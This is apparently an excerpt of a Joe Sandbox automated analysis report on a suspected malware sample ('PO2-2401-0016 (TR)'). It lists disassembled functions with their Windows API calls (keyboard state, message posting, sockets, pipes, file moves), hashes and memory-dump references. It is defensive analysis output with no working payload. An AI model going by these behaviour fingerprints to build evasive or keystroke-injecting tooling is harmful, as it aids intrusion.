                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                • String ID:
                                • API String ID: 2550207440-0
                                • Opcode ID: 37deaaf7445836110204608e4ccc5909ca66d924053c45b9db65abdb52682a7f
                                • Instruction ID: 5adb90f8b5bb69ad778708e3e2fd8a1adf3db86139209ecab48879971ab4994a
                                • Opcode Fuzzy Hash: 37deaaf7445836110204608e4ccc5909ca66d924053c45b9db65abdb52682a7f
                                • Instruction Fuzzy Hash: A791CE76A40218AFDB059FA4C885FAEB7B5FF66315F204029E910EB292D774E941CB90
                                Function 0016948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: f8768f430eebdfdda10ec9d8c8cfe4aae5b670a84d9c746c21577591209478ba
                                • Instruction ID: ef8d196e12e32cea5d0e1c3bcd1193507a7d2b171d7817dbc55942b3080245ad
                                • Opcode Fuzzy Hash: f8768f430eebdfdda10ec9d8c8cfe4aae5b670a84d9c746c21577591209478ba
                                • Instruction Fuzzy Hash: 6C913975D00219EFCB14CFA9CC84AEEBBB8FF49320F14415AE516B7251D774AA52CBA0
                                Function 001D3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001D396B
                                • CharUpperBuffW.USER32(?,?), ref: 001D3A7A
                                • _wcslen.LIBCMT ref: 001D3A8A
                                • VariantClear.OLEAUT32(?), ref: 001D3C1F
                                  • Part of subcall function 001C0CDF: VariantInit.OLEAUT32(00000000), ref: 001C0D1F
                                  • Part of subcall function 001C0CDF: VariantCopy.OLEAUT32(?,?), ref: 001C0D28
                                  • Part of subcall function 001C0CDF: VariantClear.OLEAUT32(?), ref: 001C0D34
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                • API String ID: 4137639002-1221869570
                                • Opcode ID: 9bf0180688d7809b7bb7f7e56f34186ac30b5bffe8493baf72671841bae5ca96
                                • Instruction ID: d59f9b4b4d00e01cb4ea84a3029495dd67bd2261d3ee5dee213dc65927c66740
                                • Opcode Fuzzy Hash: 9bf0180688d7809b7bb7f7e56f34186ac30b5bffe8493baf72671841bae5ca96
                                • Instruction Fuzzy Hash: 889146756083059FC704DF68C48196AB7E4FF99314F14892EF8A99B351DB30EE4ACB92
                                Function 001D4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?,?,001B035E), ref: 001B002B
                                  • Part of subcall function 001B000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0046
                                  • Part of subcall function 001B000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0054
                                  • Part of subcall function 001B000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?), ref: 001B0064
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001D4C51
                                • _wcslen.LIBCMT ref: 001D4D59
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001D4DCF
                                • CoTaskMemFree.OLE32(?), ref: 001D4DDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                • String ID: NULL Pointer assignment
                                • API String ID: 614568839-2785691316
                                • Opcode ID: a28cd172c980bb7c2b72dfe04b3e9b985ea876434fb7076bf28810a20e567230
                                • Instruction ID: 497e6a480804c7b526e933b0ee2296550c55920cdd8f40c58cd4bd61804da7a2
                                • Opcode Fuzzy Hash: a28cd172c980bb7c2b72dfe04b3e9b985ea876434fb7076bf28810a20e567230
                                • Instruction Fuzzy Hash: AD912871D0021DEFDF14DFA4D890AEEB7B9BF18300F10856AE915AB251EB349A45CFA0
                                Function 001E20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenu.USER32(?), ref: 001E2183
                                • GetMenuItemCount.USER32(00000000), ref: 001E21B5
                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001E21DD
                                • _wcslen.LIBCMT ref: 001E2213
                                • GetMenuItemID.USER32(?,?), ref: 001E224D
                                • GetSubMenu.USER32(?,?), ref: 001E225B
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001E22E3
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                • String ID:
                                • API String ID: 4196846111-0
                                • Opcode ID: 555fa9440286b9d5766c7aee3b4bb751a797053557af7ebb261da0cb8e99762c
                                • Instruction ID: 6abf312e980f005740193208f491d0deae66b1fa474671bff13df6a85d3f70ab
                                • Opcode Fuzzy Hash: 555fa9440286b9d5766c7aee3b4bb751a797053557af7ebb261da0cb8e99762c
                                • Instruction Fuzzy Hash: 6C71AE35A00645AFCB14DFA5C891AAEB7F9FF88310F158459E916EB341D734AE42CB90
                                Function 001BAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(?), ref: 001BAEF9
                                • GetKeyboardState.USER32(?), ref: 001BAF0E
                                • SetKeyboardState.USER32(?), ref: 001BAF6F
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 001BAF9D
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 001BAFBC
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 001BAFFD
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001BB020
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 786c580ce47c0f453a70814c55d2e0c58b5650b15826ce62ce52383e5c87b576
                                • Instruction ID: dac5de2974aca9ccb496804d4b9a7f551d9fde4a4f99d0f320c6b5ec96ce985f
                                • Opcode Fuzzy Hash: 786c580ce47c0f453a70814c55d2e0c58b5650b15826ce62ce52383e5c87b576
                                • Instruction Fuzzy Hash: AF5190A06086D53DFB3652348C85BFBBEA95F06304F088589F1D9958C2D3D9ECC8D751
                                Function 001BACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 001BAD19
                                • GetKeyboardState.USER32(?), ref: 001BAD2E
                                • SetKeyboardState.USER32(?), ref: 001BAD8F
                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001BADBB
                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001BADD8
                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001BAE17
                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001BAE38
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: e489662e0194fa4dc151e090ed9b9a636defc6ab207cb37ed695ea6895ba3db1
                                • Instruction ID: b387c0bd654c96bad5cc1972d8742514232456cafa250787bba7d2ce5f0491fc
                                • Opcode Fuzzy Hash: e489662e0194fa4dc151e090ed9b9a636defc6ab207cb37ed695ea6895ba3db1
                                • Instruction Fuzzy Hash: D751E4A15487D53DFB378374CC95BFABEA96F46300F488588E1D54A8C2D394EC88D7A2
                                Function 0018542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(00193CD6,?,?,?,?,?,?,?,?,00185BA3,?,?,00193CD6,?,?), ref: 00185470
                                • __fassign.LIBCMT ref: 001854EB
                                • __fassign.LIBCMT ref: 00185506
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00193CD6,00000005,00000000,00000000), ref: 0018552C
                                • WriteFile.KERNEL32(?,00193CD6,00000000,00185BA3,00000000,?,?,?,?,?,?,?,?,?,00185BA3,?), ref: 0018554B
                                • WriteFile.KERNEL32(?,?,00000001,00185BA3,00000000,?,?,?,?,?,?,?,?,?,00185BA3,?), ref: 00185584
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 1d5916ab0e68bb1553ee2df6cfac5778df7a8bc65b6980f6f076bf363dcf3b42
                                • Instruction ID: dbde87495da6e2d9df10f0ebd46500292045b2dffb53d838f70d18f6778a6993
                                • Opcode Fuzzy Hash: 1d5916ab0e68bb1553ee2df6cfac5778df7a8bc65b6980f6f076bf363dcf3b42
                                • Instruction Fuzzy Hash: 87519F71A00649AFDB11DFA8D885AEEBBFAEF09300F14415AF955E7291E7309B41CF60
                                Function 00172D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                Download Yara Rule
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00172D4B
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00172D53
                                • _ValidateLocalCookies.LIBCMT ref: 00172DE1
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00172E0C
                                • _ValidateLocalCookies.LIBCMT ref: 00172E61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 0557981be209ae9319fdff673b4b2b91529861c63093b03076ed0b93eef9aebd
                                • Instruction ID: 477094b1e5a97a89e4be78ca1f042e6d51c198d0134c82dffcc25e615776d1cc
                                • Opcode Fuzzy Hash: 0557981be209ae9319fdff673b4b2b91529861c63093b03076ed0b93eef9aebd
                                • Instruction Fuzzy Hash: 7741A234E00209ABCF20DFA8C855A9EBBB5BF58324F14C155E91C6B352D731EA42CB91
                                Function 001D10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                  • Part of subcall function 001D304E: _wcslen.LIBCMT ref: 001D309B
                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001D1112
                                • WSAGetLastError.WSOCK32 ref: 001D1121
                                • WSAGetLastError.WSOCK32 ref: 001D11C9
                                • closesocket.WSOCK32(00000000), ref: 001D11F9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                • String ID:
                                • API String ID: 2675159561-0
                                • Opcode ID: cf86a321b6baff0bdfecc682bbd388cb8f7aba57d0507fac539f2506e8293487
                                • Instruction ID: 5d46c9ce26849d8d226e5e75222893cc1dfccead930eb3cead6aa1fa482eb0b6
                                • Opcode Fuzzy Hash: cf86a321b6baff0bdfecc682bbd388cb8f7aba57d0507fac539f2506e8293487
                                • Instruction Fuzzy Hash: 9441CE31600214BFDB109F68DC85BAABBAAEF45324F14805AFD159F392C770AD85CBE1
                                Function 001BCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001BCF22,?), ref: 001BDDFD
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001BCF22,?), ref: 001BDE16
                                • lstrcmpiW.KERNEL32(?,?), ref: 001BCF45
                                • MoveFileW.KERNEL32(?,?), ref: 001BCF7F
                                • _wcslen.LIBCMT ref: 001BD005
                                • _wcslen.LIBCMT ref: 001BD01B
                                • SHFileOperationW.SHELL32(?), ref: 001BD061
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                • String ID: \*.*
                                • API String ID: 3164238972-1173974218
                                • Opcode ID: 07b6e038156d44a0bfaa710b1aa537ad17ad3965e000988f53cd3c14596d8c86
                                • Instruction ID: 7a6d321314dcc24ece057635c3078f6289e0fde1407336d2bcc319d23819d719
                                • Opcode Fuzzy Hash: 07b6e038156d44a0bfaa710b1aa537ad17ad3965e000988f53cd3c14596d8c86
                                • Instruction Fuzzy Hash: EF4149719452199FDF16EFA4DD81AEE77F9AF18340F1000EAE509EB141EB34A689CB50
                                Function 001E2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001E2E1C
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2E4F
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2E84
                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001E2EB6
                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001E2EE0
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2EF1
                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001E2F0B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LongWindow$MessageSend
                                • String ID:
                                • API String ID: 2178440468-0
                                • Opcode ID: f7137c6276b2d57230518f611f7896d7d5b5296c6f3e617d9a52161d17c3f965
                                • Instruction ID: 43202794b62cd06218753f4d3c693f5e34e20336130b2ecdf1239d843a037169
                                • Opcode Fuzzy Hash: f7137c6276b2d57230518f611f7896d7d5b5296c6f3e617d9a52161d17c3f965
                                • Instruction Fuzzy Hash: 7B3108316046A0AFDB21CF99DC98FA937E9FB5A710F1911A4F9009F2B1CB71AC91DB41
                                Function 001B7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7769
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B778F
                                • SysAllocString.OLEAUT32(00000000), ref: 001B7792
                                • SysAllocString.OLEAUT32(?), ref: 001B77B0
                                • SysFreeString.OLEAUT32(?), ref: 001B77B9
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 001B77DE
                                • SysAllocString.OLEAUT32(?), ref: 001B77EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: dfdd707aaea496d3341a9195793de32d8e387da2a715c81f04ad9c872f4ead0e
                                • Instruction ID: cb906dba4ee217f17cb50b36e21795b3167de9c0b65025e98744507b7e5a2b72
                                • Opcode Fuzzy Hash: dfdd707aaea496d3341a9195793de32d8e387da2a715c81f04ad9c872f4ead0e
                                • Instruction Fuzzy Hash: E4218E76604259AFDB10EFA8DC88CFB77ACEB49764B148425FA15DB190DB70DC8287A0
                                Function 001B77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7842
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7868
                                • SysAllocString.OLEAUT32(00000000), ref: 001B786B
                                • SysAllocString.OLEAUT32 ref: 001B788C
                                • SysFreeString.OLEAUT32 ref: 001B7895
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 001B78AF
                                • SysAllocString.OLEAUT32(?), ref: 001B78BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: 745c476e6d0d35ce9817407adc4c3694194f6062a80836c06331bcef221a56b2
                                • Instruction ID: f5bbfd388f81a2a7d1f77b45d8f07e63d5060fe6299f6363995339b153d9a049
                                • Opcode Fuzzy Hash: 745c476e6d0d35ce9817407adc4c3694194f6062a80836c06331bcef221a56b2
                                • Instruction Fuzzy Hash: 5C214135608204AFDB109FF8DC88DAA77ECEB497607118125F915CB2E1D774DC82CB64
                                Function 001C04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(0000000C), ref: 001C04F2
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001C052E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateHandlePipe
                                • String ID: nul
                                • API String ID: 1424370930-2873401336
                                • Opcode ID: f2b1110ed284eba0a4c570e5795ea07994b71ffdff7ce92f006843478f2dd7c7
                                • Instruction ID: 17f9f21cde42401f42a5918665583ef1816dec9b1ca6d7bf3b88edd325880499
                                • Opcode Fuzzy Hash: f2b1110ed284eba0a4c570e5795ea07994b71ffdff7ce92f006843478f2dd7c7
                                • Instruction Fuzzy Hash: 88218B70500345EFCF218F68DC44F9A7BA4AF69724F204A1CE8A1D62E0D770D981CF60
                                Function 001C05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 001C05C6
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001C0601
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
